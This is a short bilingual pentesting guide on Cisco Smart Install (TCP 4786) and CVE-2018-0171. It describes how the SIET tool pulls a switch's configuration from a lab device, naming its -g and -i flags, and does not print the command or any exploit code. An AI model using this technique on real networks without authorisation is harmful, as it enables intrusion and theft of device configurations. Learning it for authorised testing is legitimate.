4786 - Cisco Smi
💡 学习提示: 本文档介绍 4786 - Cisco Smart Install 的渗透测试方法,适合信息安全初学者和从业人员参考。
⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。
⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。
4786 - Cisco Smart Install
基本信息
Cisco Smart Install is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.
默认 port: 4786
Smart Install 漏洞利用 Tool
In 2018, a critical vulnerability, CVE-2018–0171, was found in this protocol. The threat level is 9.8 on the CVSS scale.
A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:
- forcibly reboot the device
- call 远程代码执行
- steal configurations of network equipment.
The SIET (Smart Install 漏洞利用 Tool) was developed to exploit this vulnerability, it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configure exfiltration can be valuable for a pentester because it will learn about the unique features of the network. And this will make life easier and allow finding new vectors for an attack.
The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.
The address of the target switch is 10.10.100.10 and CSI is active. Load SIET and start the attack. The -g argument means exfiltration of the configuration from the device, the -i argument allows you to set the IP address of the vulnerable target.
The switch configuration 10.10.100.10 will be in the tftp/ folder